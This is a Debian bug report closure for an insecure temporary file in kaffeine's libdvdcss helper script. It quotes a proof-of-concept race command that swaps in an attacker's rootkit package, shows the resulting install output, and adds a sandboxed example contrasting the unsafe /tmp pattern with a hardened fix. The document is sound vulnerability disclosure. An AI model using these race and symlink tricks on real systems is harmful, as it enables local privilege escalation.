Your message dated Mon, 09 Aug 2010 15:30:48 +0200
with message-id <>
and subject line Re: insecure temporary file /tmp/libdvdcss.deb
has caused the Debian Bug report #554772,
regarding insecure temporary file /tmp/libdvdcss.deb
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact

Debian Bug Tracking System
Contact with problems
--- Begin Message ---
Package: kaffeine
Version: 0.8.7-1
Severity: normal
Tags: security

Steps to reproduce:
1) Malice starts the following command in the background with the
   privileges of her normal user account:

sh -c 'echo > /tmp/libdvdcss.deb; inotifywait /tmp/libdvdcss.deb; rm /tmp/libdvdcss.deb; mv /tmp/rootkit.deb /tmp/libdvdcss.deb' &

2) Malice calls the local administrator Trent and complains that she
   can't watch DVDs.

3) Guided by /usr/share/doc/kaffeine/README.Debian Trent runs

sudo bash /usr/share/doc/kaffeine/

Expected results:
3) Code to decrypt DVDs is installed.

Actual results:
3) Due to insecure use of temporary files in Malice's
   rootkit.deb is installed:

$ sudo bash /usr/share/doc/kaffeine/
--2009-11-06 13:54:46--
Connecting to||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 26176 (26K) [text/plain]
Saving to: `/tmp/libdvdcss.deb'

100%[=====================================>] 26,176      --.-K/s   in 0.03s

2009-11-06 13:54:47 (799 KB/s) - `/tmp/libdvdcss.deb' saved [26176/26176]

(Reading database ... 176859 files and directories currently installed.)
Unpacking replacement rootkit ...
Setting up rootkit (0.1-1) ...
Processing triggers for man-db ...

-- System Information:
Debian Release: 5.0.3
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.26-2-xen-amd64 (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=fi_FI (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages kaffeine depends on:
ii  hdparm           8.9-3                   tune hard disk parameters for high
ii  kdelibs4c2a      4:3.5.10.dfsg.1-0lenny2 core libraries and binaries for al
ii  libc6            2.7-18                  GNU C Library: Shared libraries
ii  libcdparanoia0   3.10.2+debian-5         audio extraction tool for sampling
ii  libgcc1          1:4.3.2-1.1             GCC support library
ii  libogg0          1.1.3-4                 Ogg Bitstream Library
ii  libqt3-mt        3:3.3.8b-5              Qt GUI Library (Threaded runtime v
ii  libstdc++6       4.3.2-1.1               The GNU Standard C++ Library v3
ii  libvorbis0a      1.2.0.dfsg-3.1          The Vorbis General Audio Compressi
ii  libvorbisenc2    1.2.0.dfsg-3.1          The Vorbis General Audio Compressi
ii  libx11-6         2:1.1.5-2               X11 client-side library
ii  libxcb1          1.1-1.2                 X C Binding
ii  libxext6         2:1.0.4-1               X11 miscellaneous extension librar
ii  libxine1         1.1.14-6                the xine video/media player librar
ii  libxine1-ffmpeg  1.1.14-6                MPEG-related plugins for libxine1
ii  libxine1-x       1.1.14-6                X desktop video output plugins for
ii  libxinerama1     2:1.0.3-2               X11 Xinerama extension library
ii  libxtst6         2:1.0.3-1               X11 Testing -- Resource extension 

kaffeine recommends no packages.

kaffeine suggests no packages.

-- no debconf information

--- End Message ---
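The report above exploits one root cause: a script running as root writes to a fixed, predictable name in the world-writable /tmp, so any local user can own that name before root touches it. The following is an added example for this thread, not the kaffeine README script, showing the unsafe pattern beside a hardened replacement. Everything in it is constructed: a private sandbox directory stands in for /tmp, a local file stands in for the remote package, and `fake_download` stands in for `wget -O`, so it runs offline. The attacker step is shown in its deterministic symlink form (root's write lands wherever the attacker points the name) rather than the inotifywait/mv swap from the report, which depends on timing; the fix is the same for both.

```shell
#!/bin/sh
# Added example for this thread (not the kaffeine README script): the
# fixed-name /tmp pattern the report exploits, beside a hardened version.
# Everything here is constructed for the demo: the "remote package" is a
# local file and fake_download stands in for `wget -O`, so it runs offline.
set -u

# A private sandbox stands in for the world-writable /tmp of the report,
# so the demo never touches the real directory.  TMPDIR is pointed at it
# so the mktemp -d call inside safe_fetch lands there too.
SANDBOX=$(mktemp -d)
trap 'rm -rf "$SANDBOX"' EXIT
TMPDIR="$SANDBOX"; export TMPDIR
SOURCE="$SANDBOX/server-copy-of-libdvdcss.deb"   # what wget would fetch
TARGET="$SANDBOX/root-owned-file"                # something worth clobbering
printf 'genuine package bytes\n' > "$SOURCE"
printf 'original contents\n' > "$TARGET"

# Stand-in for `wget -O "$1" URL`: opens $1 for writing and follows a
# symlink exactly as wget or shell redirection would.
fake_download() {
    cat "$SOURCE" > "$1"
}

# Malice's move (step 1 of the report) in its deterministic form: own the
# predictable name before root writes to it.  A symlink makes root's write
# land wherever Malice chooses; the inotifywait/mv race in the report
# instead swaps the bytes after the write, but the root cause is the same.
attacker_preseed() {
    ln -s "$TARGET" "$SANDBOX/libdvdcss.deb"
}

# Vulnerable pattern: predictable, world-writable location, fixed file
# name, no check of what already sits at that path.  Prints the path.
unsafe_fetch() {
    fake_download "$SANDBOX/libdvdcss.deb"
    echo "$SANDBOX/libdvdcss.deb"
}

# Hardened pattern.  mktemp -d gives a fresh directory with an
# unpredictable name and mode 0700, so no other user can pre-create,
# watch or replace the file inside it.  A pinned checksum is the second
# line of defence: if the bytes are not the expected ones, abort before
# anything like `dpkg -i` would run.  Prints the verified path and
# returns 0 on success, 1 on fetch failure, 2 on checksum mismatch.
safe_fetch() {
    expected_sha="$1"
    dir=$(mktemp -d) || return 1
    dest="$dir/libdvdcss.deb"
    if ! fake_download "$dest"; then
        rm -rf "$dir"; return 1
    fi
    actual=$(sha256sum "$dest" | cut -d' ' -f1)
    if [ "$actual" != "$expected_sha" ]; then
        rm -rf "$dir"; return 2
    fi
    echo "$dest"
}
```

Run `attacker_preseed` and then `unsafe_fetch`, and the "download" overwrites `$TARGET` through the symlink without any error from the writer; run `safe_fetch` with the pinned SHA-256 of the genuine package and it returns a path inside a fresh 0700 directory, while changing the source bytes (the equivalent of Malice's swap) makes it return 2 and leave nothing behind. In a real script the path handed to `dpkg -i` should only ever be the one `safe_fetch` printed; fetching the package from a signed apt repository instead of an ad-hoc URL removes the need for the hand-pinned hash altogether.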
--- Begin Message ---
Version: 1.0-1

I had a look in version 1.0-1 in testing, and the
/usr/share/doc/kaffeine/ no longer exists in the package.
Because of this, I believe this bug can be closed.

Did not find anything about its removal in the Debian changelog, so I
do not know in which version it was taken away.

Happy hacking,
Petter Reinholdtsen

--- End Message ---
pkg-kde-extras mailing list